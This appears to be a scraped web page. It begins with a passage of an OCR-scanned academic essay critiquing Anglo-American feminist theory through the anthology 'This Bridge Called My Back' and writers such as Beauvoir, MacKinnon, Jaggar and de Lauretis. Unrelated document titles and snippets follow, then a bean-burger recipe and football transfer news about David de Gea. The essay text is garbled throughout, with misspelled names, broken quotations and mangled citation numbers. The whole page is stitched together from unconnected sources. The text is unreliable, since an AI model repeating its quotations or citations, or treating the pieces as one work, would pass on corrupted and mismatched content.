hecause greater attention is given to naming female identity and describing women's ways of knowing as being considerably different than men's.2 By emphasizing 'sexual difference,' a second step takes place, often called oppositional thinking (counteridentifying). However, this gendered standpoint epistemology leads to feminism's bizarre relationship with other liberation movements, working inherently against the interests of ni~nwhite women and no one else. Sandra Harding, for example, argues that oppositional thinking (counteridentification) with white men should be retained even though "There are suggestions in the literature of Native Americans, Africans, and Asians that what
4 feminists call feminine versus masculine personalities, ontologies, ethics, epistemologies, and world views may be what these other liberation movements call non-western versus Western personalities and world views... I set aside the crucial and fatal complication for this way of thinking the fact that one half of these people are women and that most women are not Western" (1986, 659~. She further suggests that feminists respond by relinquishing the totalizing "master theory" character of our theory making: "This response to the issue (will manage) to retain the categories of feminist theory... and simply set them alongside the categories of the theory making of other subjugated groups... Of course, it leaves bifurcated (and perhaps even more finely divided) the identities of all except ruling-class white Western women" (1986, 6601, The apperception of this situation is precisely what led to the choice of title for the book All the (30) Blacks are Men, All the Women are White, But some of us are Brave, edited by Gloria T. Hull, Patricia Bell Scott, and Barbara Smith (I982~. Notwithstanding the power of Bndge to affect the personal lives of its readers, Bridge's challenge to the Anglo-American subject of feminism has yet to effect a newer discourse. Women of color often recognize themselves in the pages of Bndge and write to say "The women writers seemed to be speaking to me, and they actually understood what I was going through. Many of you put into words feelings I have had that I had no way of expressing... The writings just)fied some of my thoughts telling me I had a right to feel as I did" (Moraga, Foreword to the second edition). However, Anglo feminist readers of Bridge tend to appropriate it, cite it as an instance of difference between women, and proceed to negate that difference by subsuming women of color into the unitary category of woman/women. The latter is often viewed as the "common denominator" (De Lauretis 1986, I 4), between us, though it is forgotten that it is our "common denominator" in an oppositional (counteridentifyingi discourse with some white men that leaves us unable to explore relationships among women. Bridge's writers did not see the so-called "common denominator" as the solution for the construction of the theoretical feminist subject. In the call for submissions the editors clearly stated: "We want to express to all women especially to white middle class women the experiences which divide us as feminists; we want to
5 examine the incidents of intolerance, prejudice and denial of differences within the feminist movement. We intend to explore the causes, and sources of, and solutions to these divisions. We want to create a definition that expands what 'feminist' means to us" (Moraga and Anzaldua, Introduction to the first edition, xxiii). Thus, the female subject of Bndge is highly complex. She is and has been constructed in a crisis-of- meaning situation which includes racial and cultu ra I divisions and conflicts. The psychic and material violence that gives shap~ to that subjectivity cannot be underestimated nor passed over lightly. Th' fact that not all of this violence comes from men in general but also fro women renders the notion of "common denominator ' problematic. It is clear, however, that even as Bridge becomes a resource for the Anglo-American feminist theory of classroom and syllabus, there's a tendency to deny differences if these differences pose a threat to the "common denominator'' category. That is, solidarity would be purchased with silence, putting aside the conflictive history of groups' interrelations and interdependence. In the words of Paula Treichler, "How do we address the issues and concerns raised by women of color, who may themselves be even more excluded from theoretical feminist discourse than from the women's studies curriculum?... Can we explore our 'common differences' without (31) overemphasizing the division that currently seems to characterize the feminism of the United States and the world?" (1986, 791. Clearly, this exploration appears impossible without a reconfiguration of the subject of feminist theory, and her relational position to a multiplicity of others, not just white men. Some recent critics of the "exclusionary practices in Women's Studies" have noted that gender standpoint epistemology leads to a 'tacking on' of "Material about minority women" without any note of its "sign)ficance for feminist knowledge" jbaca Zinn et al. 1986, The common approaches noted were the tendency to ( I ~ treat race and class as secondary features in social organization las well as representation! with primacy given to universal female subordination; (1~ acknowledge that inequalities of race, class, and gender generate different experiences and then set aside race and class inequalities on the grounds that information was lacking to allow incorporation into an analysis; (3) focus on descriptive aspects of the ways of
6 life, values, customs, and problems of women in subordinate race and class categories with little attempt to explain their source or their broader meaning IBaca Zinn et al. 1986, In fact, it may be impossible for gender standpoint epistemology to ever do more than a "pretheoretical presentation of concrete problems" (Baca Zinn et al. 1986, Since the subject of feminist theory and its single theme gender go largely unquestioned, its point of view tends to suppress and repress voices that question its authority, and as Jane Flax remarks, "The suppression of these voices seems to be a necessary condition for the [apparent) authority coherence, and universality of our own" (1987, This may account for the inability to include the voices of women of color in feminist discourse, even though they are not necessarily underrepresented in reading lists. For standpoint epistemologists the desire to construct a feminist theory based solely on gender, on the one hand, and the knowledge or implicit recognition that such an account might distort the representation of many women and/or correspond to that of some men, on the other, gives rise to anxiety and ambivalence with respect to the future of that feminism, especially in Anglo-America. At the core of that attitude is the often unstated recognition that if the pervasiveness of women's oppression is virtually universal on some level, it is also highly diverse from group to group and that women themselves may become complicitous with that oppression. "Complicity arises," says MacDonell, "where through lack of a positive starting point either a practice is driven to make use of prevailing values or a critique becomes the basis for a new theory" (1986, 62). The inclusion of other analytical categories such as race and class becomes impossible for a subject whose consciousness refuses to acknowledge (32) that "one becomes a woman" in ways that are much more complex than simple opposition to men. In cultures in which asymmetric race and class relations are a central organizing principle of society, one may also "become a woman" in opposition to other women. In other words, the whole category of woman may also need to be problematized, a point that I shall take up below.
7 Simone de Beauvoir and her key work The Second Sex have been most influential in the development of feminist standpoint epistemology. She may even be responsible for the creation of Anglo-American feminist theory's "episteme": a highly self-conscious ruling-class white Western female subject locked in a struggle to the death with "Man." Beauvoir shook the world of women, most especially with the ram)fications of her phrase, "One is not born, but rather becomes, a woman" ( I 974, 30I ). For over 400 pages of text after that statement, Beauvoir demonstrates how a female is constituted as a "woman" by society as her freedom is curtailed from childhood. The curtailment of freedom incapacitates her from affirming "herself as a subject" II974,3I61. Very few women, indeed, can escape the cycle of indoctrination except perhaps the writer/intellectual because "She knows that she is a conscious being, a subject" (I974,76I). This particular kind of woman can perhaps make of her gender a project and transform her sexual identity.3 But what of those women who are not so privileged, who neither have the political freedom nor the education? Do they now, then, occupy the place of the Other (the 'Brave') while some women become subjects? Or do we have to make a subject of the whole world? Regardless of our point of view in this matter, the way to becoming a female subject has been effected through consciousness raising. In 1982, in a major theoretical essay, "Feminism, Marxism, Method, and the State: An Agenda for Theory," Catherine A. MacKinnon cited Bridge as a book that explored the relationship between sex and race and argued that "consciousness-raising'' was the feminist method (1982, s The reference to Bridge is brief. It served as an example, along with other texts, of the challenge that race and nationalism have posed for Marxism. According to her, Marxism has been unable to account for the appearance of these emancipatory discourses nor has it been able to assimilate them. Nevertheless MacKinnon~s major point was to demonstrate the epistemological challenge that feminism and its primary method, "consciousness- raising," posed for Marxism. Within Marxism class as a method of analysis had failed to reckon with the historical force of sexism. Through "consciousnessraising', (from women's point of view1 women are led to know the world in a different way. Women's experience of politics, of life as sex objects, gives (33) rise to its own method of appropriating
8 that reality: feminist method IMacKinnon I982,536~. It challenges the objectivity of the "empirical gaze" and "rejects the distinction between knowing subject and known object" ( I 982, 536i. By having women be the subject of knowledge, the so-called "objectivity" of men is brought into question. Often this leads to privileging women's way of knowing in opposition to men's way of knowing, thus sustaining the very binary opposition that feminism would like to change or transform. Admittedly, this is only one of the many paradoxical procedures in feminist thinking as Nancy Cott confirms, "It acknowledges diversity among women while positing that women recognize their unity. It requires gender consciousness for its basis, yet calls for the elimination of prescribed gender roles" (I986,49~. However, I suspect that these contradictions or paradoxes have more profound implications than is readily apparent. Part of the problem may be that as feminist practice and theory recuperate their sexual differential through "consciousness-raising," women reinscribe such a differential as feminist epistemology or theory. With gender as the central concept in feminist thinking, epistemology is flattened out in such a way that we lose sight of the complex and multiple ways in which the subject and object of possible experience are constituted. The flattening effect is multipliccl when one considers that gender is often solely related to white men. There's no inquiry into the knowing subject beyond the fact of being a "woman." But what is a "woman" or a "man" for that matter? If we refuse to define either term according to some "essence," then we are left with having to specify their conventional sign)ficance in time and space, which is liable to change as knowledge increases or interests change. The fact that Anglo-American feminism has appropriated the generic term for itself, leaves many a woman in this country having to call herself otherwise, that is, "women of color, " which is equally "meaningless" without further specification. It also gives rise to the tautology, Chicana women. Needless to say, the requirement of gender consciousness only in relationship to man leaves us in the dark about a good many things, including interracial and intercultural relations. It may well be that the only purpose this type of differential has is as a political strategy. It does not help us envision a world beyond binary
9 restrictions, nor does it help us reconfigure feminist theory to include the "native female." It does, however, help us grasp the paradox that within this cultural context one cannot be a feminist without becoming a gendered subject of knowledge which makes it very difficult to transcend gender at all and to imagine relations between women. In Feminist Politics and Human Nature (I983), Alison M. Jaggar, (34) speaking as a socialist feminist, refers repeatedly to Bridge and other works by women of color unrepresented in feminist theory. Jaggar claims that socialist feminism is inspired by Marxist and radical feminist politics though the latter has failed to be scientific about its insights. Bndge is cited various times to counter the racist and classist position of radical feminists II983, , ~. Jaggar charges that "Radical feminism has encouraged women to name their own experience but it has not recognized explicitly that this experience must be analyzed, explained and theoretically transcended" ( 38 I 1. In a sense Jaggar's charge amounts to the notion that radical feminists were flattening out their knowledge by an inadequate methodology, that is, gender consciousness-raising. Many of Jaggar's observations are a restatement of Bridge's challenge to Anglo-American feminists of all political persuasions, be it liberal, radical, Marxist, or socialist, the types sketched out by Jaggar. For example, Jaggar's "A representation of reality from the standpoint of women must draw on the variety of all women's experience" (386) may be compared to Barbara Smith's view in Bndge that "Feminism is the political theory and practice to free all women: women of color, working-class women, poor women, physically challenged women, lesbians, old women, as well as white economically privileged heterosexual women" (6I). Jaggar continues, "Since historically diverse groups of women, such as working-class women, women of color, and others have been excluded from intellectual work, they somehow must be enabled to participate as subjects as well as objects of feminist theorizing" (386~. Similarly, writers in Bndge appear to think that "consciousness-raising" and the naming of one's experience would deliver some theory and yield a notion of "what feminist means to us" (xxiii). However, except for Smith's statement, there is no overarching view that would guide us as to "what feminist means to us." Though there is a tacit political identity
10 gender/class/race encapsulated in the phrase "women of color" that connects the pieces, they tend to split apart into "vertical relations'' between "culture of resistance" and the "culture resisted or from which excluded." Thus, the binary restrictions become as prevalent between race/ethnicity of oppressed versus oppressor as that between the sexes. The problems inherent to Anglo-American feminism and race relations are so locked into the "Self-Other" theme that it is no surprise that Bridge's coeditor Moraga would remark, "In the last three years I have learned that Third World feminism does not provide the kind of easy political framework that women of color are running to in. droves. The idea of Third World feminism has proved to be much easier between the covers of a book than between real live women" (Moraga, foreword to the second (35) edition!. She refers to the United States, of course, because feminism is alive and well throughout the Third World largely within the purview of women's rights or as a class struggle.4 The appropriation of Bridge's observations in Jaggar's work differs slightly from the others in its view of linguistic usage implying to a limited extent that language is also reflective of material existence. The crucial question is how indeed can women of color be subjects as well as objects of feminist theorizing? Jaggar cites Maria Lugones's doubts, "We cannot talk to you in our language because you do not understand it... The power of white Anglo women vis-a-vis Hispanas and African-American women is in inverse proportion to their working knowledge of each other... Because of their ignorance, white Anglo women who try to do theory with women of color inevitably disrupt the dialogue. Before they can contribute to collective dialogue, they need to 'know the text,' to have become familiar with an alternative way of viewing the world... You need to learn to become unintrusive, unimportant, patient to the point of tears, while at the same time open to learning any possible lessons. You will have to come to terms with the sense of alienation, of not belonging, of having your world thoroughly disrupted, having it criticized and scrutinized from the point of view of those who have been harmed by it, having important concepts central to it dismissed, being viewed with mistrust" II983, 386~. Lugones's advice to Anglo women to listen was post-bridge. But we should recall that one of Bridge's breaks with prevailing conventions was, of course, linguistic. If
11 prevailing conventions of speaking/writing had been observed many a contributor would have been censored or silenced. So would have many a major document or writing by minorities. Bridge leads us to understand that the silence and silencing of people begins with the dominating enforcement of linguistic conventions, the resistance to relational dialogues, as well as the disenablement of peoples by outlawing their forms of speech. As already noted, Anglo-American feminist theory has assumed a speaking subject who is an autonomous, self-conscious individual woman; yet, it has also taken for granted the linguistic status which founds subjectivity. In this way it appropriates woman/women for itself and turns its work into a theoretical project within which the rest of us are compelled to fit. By forgetting or refusing to take into account that we are culturally constituted in and through language in complex ways and not just engendered in a homogeneous situation, the Anglo-American subject of consciousness cannot come to terms with her Ihisl own class-biased ethnocentrism. She is blinded to her own construction not just as woman but as an Anglo-American one. Such a subject creates a theoretical subject that could not possibly include all women just because we are women. (36) Against this feminist backdrop many "women of color" have struggled to give voice to their subjectivity, as evidenced in the publication of the writings collected in Bridge. However, the freedom of women of color to posit themselves as multiple-voiced subjects is constantly in peril of repression precisely at that point where our constituted contradictions put them at odds with women different from themselves. The pursuit of a "politics of unity" solely based on gender forecloses the "pursuit of solidarity" through different political formations and the exploration of alternative theories of the subject of consciousness. There is a tendency in more sophisticated and elaborate gender standpoint epistemologists to affirm "an identity made up of heterogeneous and heteronomous representations of gender, race, and class, and often indeed across languages and cultures'' lde Lauretis 1986, 9) with one breath and with the next to refuse to explore how that identity may be theorized or analyzed, by reconfirming a unified subjectivity or "shared consciousness" through gender. The difference is handed over with one hand and taken away with the other.
12 If it were true as Teresa de Lauretis has observed that "Self and identity,... are always grasped and understood within particular discursive configurations" ji986, 8), it does not necessarily follow that one can easily and self-consciously decide "to reclaim lan identity) from a history of multiple assimilations" II986, 9) and still retain a "shared consciousness." Such a practice goes counter to the homogenizing tendency of the subject of consciousness in the United States. To be oppressed means to be disenabled not only from grasping an "identity," but also from reclaiming it. To grasp or reclaim an identity in this culture means always already to have become a subject of consciousness. The theory of the subject of consciousness as a unitary and synthesizing agent of knowledge is always already a posture of domination. One only has to think of Gloria Anzaldua's essay in Bridge, "Speaking in Tongues: A Letter to Third World Women Writers'' (I65-74~. Though De Lauretis concedes that a racial "shared consciousness,' may have prior claims than gender, she still insists on unity through gender, "the female subject is always constructed and defined in gender, starting from gender" II986, I9). One is interested in having more than an account of gender; there are other relations to be accounted for. De Lauretis still insists, in most of her work, that "the differences among women may be better understood as differences within women" ( I 986, I 4~. This position returns us all to our solitary, though different, consciousness, without noting that some differences are jhave been) a result of relations of domination of women by women, that differences may be purposefully constituted for the purpose of domination or exclusion, especially in oppositional thinking. (37) Some of the writers in Bridge thought at some point in the seventies that feminism could have been the ideal answer to their hope for liberation. Chrystos, for example, states her disillusionment as follows, "I no longer believe that feminism is a tool which can eliminate racism or even promote better understanding between different races & kinds of women" 169~. The disillusionment is eloquently reformulated in the theme poem by Donna Kate Rushin, "The Bridge Poem" (xxi-xxii~. The dream of helping the people who surround her to reach an interconnectedness that would change society is given up in favor of self-translation into a "true self." In my view the speaker's refusal to play "bridge," an enablement to others as well as self, is the acceptance of defeat at the hands of political groups whose selfdefinition follows the
13 view of self as unitary capable of being defined by a single "theme." The speaker's perception that the "self" is multiple ("I'm sick of mediating with your worst self / On behalf of your better selves" [xxii]) and its reduction harmful gives emphasis to the relationality between one's selves and those of others as an ongoing process of struggle, effort, and tension. Indeed, in this poem the better "Bridging self" of the speaker is defeated by the overriding notion of the unitary subject of knowledge and consciousness so prevalent in Anglo-American culture. Difference, whether it be sexual, racial, or social, has to be conceptualized within a political and an ideological domain.5 In Bridge, for example, Mirtha Quintanales points out that "in this country, in this world, racism is used both to create false differences among us and to mask very sign)ficant ones cultural, economic, political" ( I Consciousness as a site of multiple voicings is the theoretical subject, par excellence, of Bndge. These voicings (or thematic threads~ are not viewed as necessarily originating with the subject, but as discourses that transverse consciousness and which the subject must struggle with constantly. Rosario Morales, for example, says "I want to be whole. I want to claim myself to be Puerto Rican, and U.S. American, working class & middle class, housewife and intellectual, feminist, marxist and antiimperialist" ("Ii. Gloria Anzaldua observes, "What am I? A third world lesbian feminist with Marxist and mystic leanings. They would chop me up into little fragments and tag each piece with a label" (:os). The need to assign multiple registers of existence is an effect of the belief that knowledge of one's subjectivity cannot be arrived at through a single "theme." Indeed the multiple-voiced subjectivity is lived in resistance to competing notions for one's allegiance or self-identification. It is a process of disidentification (Pecheux 1982, ) with prevalent formulations of the most forcefully theoretical subject of feminism. The choice of one or many themes is both a theoretical and a political (38) decision. Like gender epistemologists and other emancipatory movements, the theoretical subject of Bridge gives credit to the subject of consciousness as the site of knowledge but problematizes it by representing it as a weave. In Anzaldua's terms the woman of color has a "plural personality." Speaking of the new mestiza in
14 Borderlands/La Frontera, she says, "She learns to juggle cultures. The juncture where the mestiza stands, is where phenomena tend to collide" ( I 987, 791. As an object of multiple indoctrinations that heretofore have collided upon her, their new recognition as products of the oppositional thinking of others can help her come to terms with the politics of varied discourses and their antagonistic relations. The most remarkable tendency in the work reviewed in this essay is the implicit or explicit acknowledgment that, on the one hand, women of color are excluded from feminist theorizing on the subject of consciousness and, on the other, that though excluded from theory, their books are read in the classroom and/or duly (foot1noted. Given these current institutional and political practices in the United States, it is almost impossible to go beyond an oppositional theory of the subject. However, it is not the theory that will help us grasp the subjectivity of women of color. Socially and historically, women of color have been now central, now outside antagonistlc relations among races, classes, and genders. It is this struggle of multiple antagonisms, almost always in relation to culturally different groups, and not just genders, that gives configuration to the theoretical subject of Bridge. It must be noted, however, that each woman of color cited here, even in her positing of a "plurality of self," is already privileged enough to reach the moment of cognition of a situation for herself. This should suggest that to privilege the subject, even if multiple-voiced, is not enough. Notes I. Hereinafter cited as Bndge. the book has had two editions. I use the second edit)' published by Kitchen Table Prcss, ^ ~' Press, I 9 8 I. Iy83. The first edition was published by Persephone 2. For an intriguing demonstration of these operations, sce Seyla Benhabib "The Generalized and the Concrete Other: Thc Kohlberg-Gilligan Controversy and Feminist Theory" II987, 77-95). 3. For a detailed discussion of this theme, see ludith Butler, "Variations on Sex and
important theories emerging in the Twentieth Century. The dominated the debate on the private-public divide by showing its use to
In contemporary political philosophy feminism is one of the most important theories emerging in the Twentieth Century. The contemporary debate on private-public debate has been greatly impacted by the
Overview In this lecture we will focus on the difference between sex and gender, and review the emergence of the study of gender as a discipline.
3. Gender Theory Overview In this lecture we will focus on the difference between sex and gender, and review the emergence of the study of gender as a discipline. Objectives By the end of this topic you
There are many theories as to where the meaning of a work of literature comes from, some state that the meaning comes solely from the text, but reader-response theory as well as feminist criticism negate
1 1 The Unique Character of Human Existence Each of us is confronted with the challenge of being human, the challenge of becoming a person. It is important to emphasize this word challenge, because it
DEFINITIONS AND KEY CONCEPTS Race: A social construct that artificially divides people into distinct groups based on characteristics, such as physical appearance (particularly color), ancestral heritage,
Feminist Ethnography By Kristin Aune Feminist ethnography is a research methodology, a theory about how research should proceed. Its principal method is observational research conducted over time and motivated
Power and gender: analysing the experiences of women for transformed practices in higher education in South Africa (0224)
Rita Niemann University of the Free State, South Africa Power and gender: analysing the experiences of women for transformed practices in higher education in South Africa (0224) Programme number: J4 Research
Liberal feminism form of the equality type of feminism: Liberal feminism is a form of feminism that argues that equality for women can be achieved through legal means and social reform. Liberal feminism
Analyzing Research Articles: A Guide for Readers and Writers 1 Sam Mathews, Ph.D. Department of Psychology The University of West Florida The critical reader of a research report expects the writer to
ON EXTERNAL OBJECTS By Immanuel Kant From Critique of Pure Reason (1781) General Observations on The Transcendental Aesthetic To avoid all misapprehension, it is necessary to explain, as clearly as possible,
Critical Political Economy Lecture 1: Introduction What is critical political economy? A form of analysis that attacks the status quo, dominant paradigm, ideology Burkitt "Radical political economists
Cultural Analysis of Sport in the US Using Social Theories: How Can They Help Us Study Sports in Society? Week I KIN 507 Spring, 2008 Daniel Frankl, Ph.D. Professor of Kinesiology California State University,
Assessment Plan Department of Psychology Park University. Preparing learners to think critically. Preparing learners to think
Assessment Plan Department of Psychology Park University The approach adopted by the Department of Psychology stems from the mission of Park University to prepare learners to think, communicate effectively
Preface A Plea for Cultural Histories of Migration as Seen from a So-called Euro-region The Centre for the History of Intercultural Relations (CHIR), which organised the conference of which this book is
Michael Lacewing Descartes arguments for distinguishing mind and body THE KNOWLEDGE ARGUMENT In Meditation II, having argued that he knows he thinks, Descartes then asks what kind of thing he is. Discussions
DIVERSITY. Harmony, Division and Solution. Diversity means differences or variations or unlikeness. In our modern world,
DIVERSITY Harmony, Division and Solution Diversity means differences or variations or unlikeness. In our modern world, diversity plays an important role. Present study, diversity has been sorted with many
Call for Papers. Philosophy of Education Conference, Azim Premji University, Bangalore. January 9 11, 2017
Call for Papers Philosophy of Education Conference, 2017 Azim Premji University, Bangalore January 9 11, 2017 The terms theory and practice are often counterposed to indicate a dichotomy or dualism that
HOW TO WRITE A STRONG THESIS STATEMENT A WRITING CENTRE HANDOUT 1. UNDERSTAND THE ACADEMIC WRITING TASK You can begin to formulate a good thesis statement only after you have got a solid grasp of the purpose
Elizabeth Bogen The Law on the Headscarf France s 2004 law, known popularly as the law on the headscarf, reveals the difficulty of respecting conflicting ideas between diverse communities, especially when
Fall 2008 Sociology 101A Michael Burawoy HISTORY OF SOCIAL THEORY A course on the history of social theory can be presented with two different emphases -- as intellectual history or as theoretical tradition.
Simone de Beauvoir: women as the other. Written by Administrator Friday, 07 May 2010 02:18 - Last Updated Friday, 07 May 2010 02:20
Simone de Beauvor was a French philosopher, novelist, and essayist, the lifelong companion of Jean-Paul Sartre. Beauvoir s two volume treatise. The Second Sex is among the most widely read feminist work.
Undergraduate Psychology Major Learning Goals and Outcomes i Goal 1: Knowledge Base of Psychology Demonstrate familiarity with the major concepts, theoretical perspectives, empirical findings, and historical
J. T. M. Miller, Department of Philosophy, University of Durham 1 Methodological Issues for Interdisciplinary Research Much of the apparent difficulty of interdisciplinary research stems from the nature
9699 SOCIOLOGY. Mark schemes should be read in conjunction with the question paper and the Principal Examiner Report for Teachers.
Appendix A: Assessment s * Assessment for all programs is ongoing, but will not be reported until at least 5 students have graduated with minor. dates are blank for now, but will be changed once programs
Comments on Professor Takao Tanase s Invoking Law as Narrative: Lawyer s Ethics and the Discourse of Law
Proceedings from the 2005 Sho Sato Conference in Honor of Takao Tanase Comments on Professor Takao Tanase s Invoking Law as Narrative: Lawyer s Ethics and the Discourse of Law Norman Spaulding Stanford
Harvard College Program in General Education Faculty of Arts and Sciences Harvard University. A Guide to Writing in Ethical Reasoning 15
Harvard College Program in General Education Faculty of Arts and Sciences Harvard University A Guide to Writing in Ethical Reasoning 15 A Guide to Writing in Ethical Reasoning 15 Professor Jay M. Harris
The Rise of Narrative Non-Fiction Simon Singh Traditionally popular science writers have put the emphasis on explanation, concentrating on conveying to the reader an understanding of scientific concepts.
Chapter 13 Prejudice: Causes and Cures Prejudice Prejudice is ubiquitous; it affects all of us -- majority group members as well as minority group members. Prejudice Prejudice is dangerous, fostering negative
Introduction to Open Spaces for Dialogue and Enquiry Critical literacy in Higher Education Linda Ramirez Barker First thoughts. Think of a young child starting school today. It is estimated that up to
Global Competence Matrices on issues of global significance. Global Competence can be developed within any discipline, and it can cut across disciplines. The seven global competence matrices one main matrix
Field Education in the 2008 EPAS: Implications for the Field Director s Role Dean Pierce 2008 EPAS Curriculum Features The 2008 EPAS consists of four curriculum features: 1) program mission and goals;
Learning Enhancement Team Writing a Dissertation This Study Guide addresses the task of writing a dissertation. It aims to help you to feel confident in the construction of this extended piece of writing,
Farzad Family Law Scholarship 2014 Should the right to marry for same-sex couples become a federal constitutional right by amendment to the United States Constitution or remain a State issue? The United
MSW Core Curriculum for Generalist Practice St. Catherine University/University of St. Thomas Core and Advanced Competencies of the MSW Program The SCU/UST MSW curriculum prepares its graduates for advanced
Gender Identity and Expression and Simone de Beauvoir. One is not born, but rather becomes, woman. 1 This is perhaps the line most
Gender Identity and Expression and Simone de Beauvoir One is not born, but rather becomes, woman. 1 This is perhaps the line most often quoted from Simone de Beauvoir s groundbreaking work The Second Sex,
SYG 2000 Course. 1. Define Sociology and explain the insights and benefits of the sociological imagination/perspective.
SYG 2000 Course Introduction to Sociology Learning Objectives In General, always be able to present a review of the key insights from any classroom video or activity connected to each chapter. Also, know
Foreword Designing Learning for All Learners Martha L. Minow How can public policy help us envision and implement a new kind of curriculum one that expands learning opportunities for everyone rather than
1 It is widely accepted by those in the scientific community that women have been systematically disregarded and discriminated against in science. However, the extent to which this has undermined aspirations
CREDIT TRANSFER: GUIDELINES FOR STUDENT TRANSFER AND ARTICULATION AMONG MISSOURI COLLEGES AND UNIVERSITIES With Revisions as Proposed by the General Education Steering Committee [Extracts] A. RATIONALE
Humanities Department Telephone (541) 383-7520 FA 101: Introduction to Film Outcome 1: Will be able to identify and explain the different languages of filmmaking, including cinematography, editing, mise-en-scene
Knowledge of Multicultural School Counseling 2 At my school about half the population is ELL students. I feel inadequate when it comes to working with ELL students due to language barriers. My school is
Oregon Education Investment Board: Equity Lens OEIB Vision Statement To advise and support the building, implementation and investment in a unified public education system in Oregon that meets the diverse
COMMON BELIEF 1 I don t think of my students in terms of their race or ethnicity. I am color blind when it comes to my teaching.
A PROJECT OF THE SOUTHERN POVERTY LAW CENTER.ORG Common Beliefs COMMON BELIEF 1 I don t think of my students in terms of their race or ethnicity. I am color blind when it comes to my teaching. When teachers
Psychoanalytic Social Theory Karen Horney Psychoanalytic Social Theory is built on the assumption that social and cultural conditions, especially childhood experiences, are largely responsible for shaping
1 Sample Student Essay and Prompt Directions for applicant: Imagine that you are teaching a class in academic writing for first-year college students. In your class, drafts are not graded. Instead, you
INDEX OF TEMPLATES INTRODUCING WHAT THEY SAY A number of sociologists have recently suggested that X s work has several fundamental problems. It has become common today to dismiss X s contribution to the
JUMP CUT A REVIEW OF CONTEMPORARY MEDIA The Nightcleaners (part one) Rethinking political cinema by Claire Johnston from Jump Cut, no. 12/13, 1976, pp. 55-56 Reprinted from Spare Rib, No. 40, Oct. 1975.
Chapter 2 Conceptualizing Scientific Inquiry 2.1 Introduction In order to develop a strategy for the assessment of scientific inquiry in a laboratory setting, a theoretical construct of the components
Experiencing difference: Prejudice and racism in nursing education Dr Lois Berry RCN Joint Education Forums 3 rd International Conference & Exhibition Belfast, Northern Ireland June 16, 2011 Learning outcomes
White Privilege: Unpacking the Invisible Backpack by Peggy McIntosh Through the work to bring materials from Women s Studies into the rest of the curriculum, I have often noticed men s unwillingness to
Awards Standards - Generic Higher Education and Training www.qqi.ie July 2014/HS4 QQI Generic Standards The Qualifications (Education & Training) Act 1999 required the Higher Education and Training Awards
1/10 Descartes 2: The Cogito and the Mind Recap: last week we undertook to follow Descartes path of radical doubt in order to attempt to discover what, if anything, can be known for certain. This path
The Effect of Questionnaire Cover Design in Mail Surveys Philip Gendall It has been suggested that the response rate for a self administered questionnaire will be enhanced if the cover of the questionnaire
Conceptual Framework for the Master of Arts in Teaching at Earlham College: Awakening the Teacher Within It is worth acknowledging, in all humility, that, though there are many great, beautiful, noble
Educational Leadership in Europe John West-Burnham. Education systems are one of the most explicit and direct manifestations of national cultures, identities and social and economic priorities. Indeed
Joel Correia 25 February 2012 Geo-methodology Write-up Geo-epistemology: (Critical) Reflexivity and Positionality Observation has been taken for granted as something that occurs naturally [ ] With critical
ABA Is an extension of Experimental Analysis of Behavior to applied settings Is not the same as modification Uses cognition in its approach Focuses on clinically or socially relevant s Is used in many
Michael Lacewing Substance dualism A substance is traditionally understood as an entity, a thing, that does not depend on another entity in order to exist. Substance dualism holds that there are two fundamentally
Sartre and Freedom. Leo Franchi. Human freedom is undoubtedly one of the most fundamental ideas that has driven the
Sartre and Freedom Leo Franchi Human freedom is undoubtedly one of the most fundamental ideas that has driven the development of democratic politics in the last few hundred years. Freedom is taught in
Focus Question. Essential Questions. August Comte. Sociology. Prominent Contributors to Sociological Thought. How did the field of sociology develop?
Focus Question What is social Darwinism? 1-2: Sociology: Then and Now Sociology Essential Questions How did the field of sociology develop? In what ways do the three main theoretical perspectives in sociology
Factor Analysis Summary of the AAC&U s Intercultural and Global Learning VALUE Rubric and Inclusive Excellence Model AIR 2015 Conference Presentation - May 28, 2015 By K. Eagan, O. Mayorga and J. Ramirez
Yes these are as good as they look, and of course they are easy to make also. If you've ever wanted to make your own meatless burger this is a good one to try. And also, as usual, this recipe is simply a guide. Change the beans, seasonings, etc., to suite your person liking. And before you ask--because I already know that your thinking it--I'll answer three questions:
1. Can these be made completely vegan? Yes, simply omit the egg and the cheese, and if you like replace it with soy cheese. It may have a more crumbly texture, but still be just as flavorful.
2. Can these be made gluten free? Yes. Cooked brown rice or uncooked instant oats would likely be good substitutes for the breadcrumbs. To use the cooked rice puree it with the beans, and when using oats (which would likely be a better option), add them when you would the bread crumbs and let the mix sit for 20 minutes or so to allow the oats to absorb moisture. This, too, will probably yield a more crumbly texture but still be just as flavorful.
3. Can these be baked instead of pan-fried to alleviate fat. Yes, definitely. Simply lay them flat on a baking sheet and bake them in a preheated oven. The only difference is that they probably will not have the crispy crust as pictured, but they will still be just as flavorful.
I really hope you try these because they are so easy to make and really flavorful. I'd be interested in hearing how they came out, and if you tried any variations (of those listed or your own).
Place half of the beans in a food processor and pulse for just a few seconds, until coarse but slightly mashed; transfer these beans to a large bowl. Add the remaining beans to the food processor with the eggs, and process until very smooth; add the bean-egg puree to the bowl with the coarse beans. Add the remaining ingredients to the bowl (but not the olive oil which is for cooking the burgers) and mix well. Let the mix rest for a couple minutes, then mix it again. Divide the mix into ten balls and shape into burgers, transferring them to platters or a baking sheet that is lightly dusted with breadcrumbs. Heat a large heavy skillet with 1/8th inch olive oil over medium-high heat. Cook the burgers for about 10 minutes, turning them as necessary, or until golden, crispy, and cooked throughout. Transfer to absorbent paper before serving.
I am not really fond of black beans but this looks really amazing. I surely wanna try this one over the weekend.
David de Gea closing in on new £350,000-a-week deal | Football Action – Latest Football News and Blog
Manchester United are on the verge of tying down goalkeeper David de Gea to a new long-term deal worth £350,000-a-week, according to The Sun.
The 27-year-old goalkeeper is said to be ready to pen down a new five-year contract at Old Trafford before heading off to the World Cup.
Real Madrid’s consistent interest in the Spaniard has refused to go away, but the report suggests that years of transfer rumours will end in the coming weeks as both parties are happy with the offer.
De Gea has kept a total of 91 clean sheets for Manchester United in 231 Premier League appearances since arriving from Atletico Madrid around seven years ago.
DISCLAIMER: The content and pictures published on this site is for only informational purposes and it rely on other websites. The owner of this site will not be liable for any errors, damages, losses or injuries from the use of this information.
Sky Sports pundit Paul Merson has given his prediction of the Premier League clash between Tottenham and Newcastle. More...
Sky Sports pundit Paul Merson has given his prediction of the Premier League clash between Swansea and Southampton. More...
Sky Sports pundit Charlie Nicholas has given his prediction of the Europa League clash between Atletico Madrid and Arsenal. More...
Paris Saint-Germain star Kylian Mbappe has urged his club to sign Chelsea midfielder NGolo Kante this summer. More...
Sky Sports pundit Charlie Nicholas has given his prediction of the Champions League clash between Roma and Liverpool. More...
Bournemouth have reportedly joined the race for the signing of Celtic and Scotland defender Kieran Tierney. More...
